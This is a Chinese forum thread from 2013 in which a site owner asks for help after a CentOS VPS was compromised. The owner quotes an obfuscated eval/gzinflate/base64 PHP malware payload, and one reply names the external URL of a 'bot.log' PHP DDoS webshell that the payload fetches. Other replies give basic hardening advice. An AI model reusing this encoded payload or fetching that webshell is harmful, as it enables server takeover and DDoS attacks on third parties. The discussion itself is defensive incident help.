centos VPS被入侵，我该怎么处理？

zghz · 发表于 2013-5-29 13:14:50

本帖最后由 zghz 于 2013-5-29 13:16 编辑

这个黑客昨天在我的网站根目录放了若干个文件，然后我的站点任何一个页面打开就只出现一个图片无法显示的红X。

查看网页源码，它把下面的字符串经过 eval(gzinflate(str_rot13(base64_decode('这里放的是下面字符串')))) N重加密

3ZjNd4NAGFL3hb6DuyQFNb+lNEO6KV1p032w+hktk5nBGXhPyLs3LU2NV4jTht5pF4ODB8M9HBKH/TDlvo4FX9A6SU31e7QmvzcYeS
8v7j8+9nvZkrQVdi1iXTfLMicg4SmicVJZOJy5mbR9wTVk7VeWLnCu3BehHSaWlv1xbKPr8Sz0pjfXs+F1U8PpzSQcQib+iz8dBU4wZ17lZ
S4pbifd2RvMv7j8Z3/IkFickYvtHxyIjDPhBZbtGSKekWLD15atUZr4cQhqalO8kLQfnfoLmfGbgT0+PJs97u58LytMTGkSaZ9BYLltJeew08
75Qyde8KFC/YsTe/IFJuz0C0BgBcQ8oLUjI+lctZEbiuKbfulj/BC7+8Hd5QUxUmRY0aiIGFtHuqb8ArFhqmdrAqzS4ervgBJIfkhVQPVI8b
DESiXreaiDbMFpQxsltgzwm6iV9i/IAbiP2jBkckTrklMzHbn3F+1xQ0SGDCe01FN2TRUd9WwB2UM5GaAyZjJgWhaEsHfMARFomKOBKT
Cn6mGjb1O4nUcjxB38H+ijOim6AJC7qIb4D4Xw5iXHcKr2Cr56n+4hZjRypKeUjpI0j5niEjF0VzY8v5V5uHOrMKI6rVEEtEwJh+WxkquzX
CqTgo2bJiPy/PEDp4UVXwfAkdOEBNdQo0R+USDGf7B5au8=

网友帮我解密后代码如下：

我的理解是他把代码放在了图片里，然后在我的目录里面执行了这些代码，我想获取这个图片看他到底做了什么但是我不知道该怎
么获取。

PS：后来我把这些文件删除了，我发现除了昨天，前几天这个人还放了其他一些文件到我的服务器，并且那时候访问我的网站任
何页面都非常卡，重启服务器后情况缓解，但过一段时间又变得非常卡，不知道是不是这个黑客又进行了某些操作导致的。

请问

1.能否有兄弟帮我找到这个图片并翻译成代码

2.他是通过什么手段入侵我的服务器的？

3.要这么做好服务器安全措施，以防再次被攻击？

先谢谢大家了！

abcwuwuwu · 发表于 2013-5-29 15:08:59

把 exec 这函数给禁了

fatiery · 发表于 2013-5-29 15:42:35

1.能否有兄弟帮我找到这个图片并翻译成代码

重点代码直接看 http://deoaseermelo.nl/wp-content/plugins/bot.log

2.他是通过什么手段入侵我的服务器的？

任何一个漏洞都可以入侵你的服务器，最普遍的如系统漏洞、网站程序漏洞，如果你用的是常用的CMS或博客类程序的话十有八九是网站程序造成的

3.要这么做好服务器安全措施，以防再次被攻击？

服务器安全防护是一个专业领域，需要花大量时间学习和研究。
防止被攻击，最基础也是最简单的有效的方法就是经常更新网站程序，因为根据我的经验90%以上的入侵都是由网站漏洞造成。

想更安全一点的话可以修改SSH默认端口；关闭不用的端口；安装防火墙（常用的如CSF）；安装杀毒软件（如ClamAV）定期的进行扫描等等。

另外想告诉你，被加密代码的作用是下载“bot.log”这个webshell，这个webshell是一个phpddos，用来攻击其他的服务器，很占服务器资源，这就是为什么你的网站打开很卡的原因。

zghz · 发表于 2013-5-29 15:48:52

fatiery 发表于 2013-5-29 15:42
1.能否有兄弟帮我找到这个图片并翻译成代码

重点代码直接看 http://deoaseermelo.nl/wp-content/plugins/b ...

太感谢你了兄弟！bot。log这个webshell 是否还存在我的电脑里面，如果还存在我该怎么删除它呢？

fatiery · 发表于 2013-5-29 17:00:23

你可以运行 find whereis locate 这样的查找命令查找文件并清除

关于命令的详细介绍请看：http://www.iteye.com/topic/406709

luguo · 发表于 2013-5-29 18:06:21

history 命令, 如果没删除的话.

河小马 · 发表于 2013-5-30 03:31:47

入侵是挡不住的，只能经常备份，同时随时升级

对于vps 来说，如果不是很懂的话，建议买managed 的服务

否则问题多多

zghz · 发表于 2013-5-30 10:10:57

luguo 发表于 2013-5-29 18:06
history 命令, 如果没删除的话.

好的兄弟，谢谢！

zghz · 发表于 2013-5-30 10:13:43

河小马发表于 2013-5-30 03:31
入侵是挡不住的，只能经常备份，同时随时升级

对于vps 来说，如果不是很懂的话，建议买managed 的服务

好的，感谢河马！

aabbccli · 发表于 2013-5-30 16:27:05

入侵分两种，一种是网站程序漏洞，一种是服务器本身的漏洞，服务器可以用IPTABLES把非80端口的外网请求全禁了，程序漏洞的话麻烦。

		自动登录	找回密码
密码			立即注册

谷歌+Bing+TT+MSN官方代理	⚡️按条S5代理⚡️静态⚡️独享⚡️5G	⚡️最干净<Wifi住宅+5G移动>IP代理	泰国仓储，本土仓发货2-3元/单
指纹浏览器，就用AdsPower	谷歌/FB/Bing/Yahoo代理商开户	7200W全球动态不重复住宅IP代理	全球优质流量，选TrafficStars
出售Facebook,友缘号,FB广告号,ins	FB/TT/KW 加白开户	ADPLEXITY + ADVERTCN	比Adplexity还好用的Spy工具
广	告	开	户
FB/Google/TK	海外多媒体	极速	下户
BINOM TRACKER 60% OFF!	MediaGo+Taboola+Ob开户	百度国际MediaGo⚡️让产品狂奔全球	百度国际，高点击转化，快速放量
百度国际MediaGo，独家原生流量	虚拟信用卡+独立站收款	行业首创新型指纹Cloak, 谷歌奇效!	Kookeey⚡️100%独享⚡️原生住宅IP
⚡IPFoxy住宅代理全场88折⚡	全球虚拟卡, 支持U充值	免账户投放 FB 广告（送项目）	2024做什么 - Media buy 项目库
免费黑五教程（持续更新、欢迎交流）	Facebook 批量上广告	Bridgeway - 联盟营销网络	IPCola 全新住宅代理 ⚡️ 免费试用
各种主页、账单户、BM户（优势）	⚡️个人户，bm户不限额，账单户	Adsterra 的CPA/CPM/CPC 网站流量	在线注册美国/英国/香港等海外公司
EU KETO/CBD - Jumbleberry	FB二三解1元/个	9Proxy ⚡️ $0.04/IP, 无限带宽	cloak斗篷/ss/nutra/cpa/Dating
E.PN 虚拟卡	Asocks代理服务器$3/GB	高薪诚求实力FB投手（独立站）	《全新虚拟卡+全球收付款》
广告位出租	全球低价纯净住宅/移动IP-免费试用	广告代投, 东南亚物流, 虚拟信用卡	VMLogin指纹浏览器+多账号防关联

centos VPS被入侵，我该怎么处理？

评分

社区QQ达人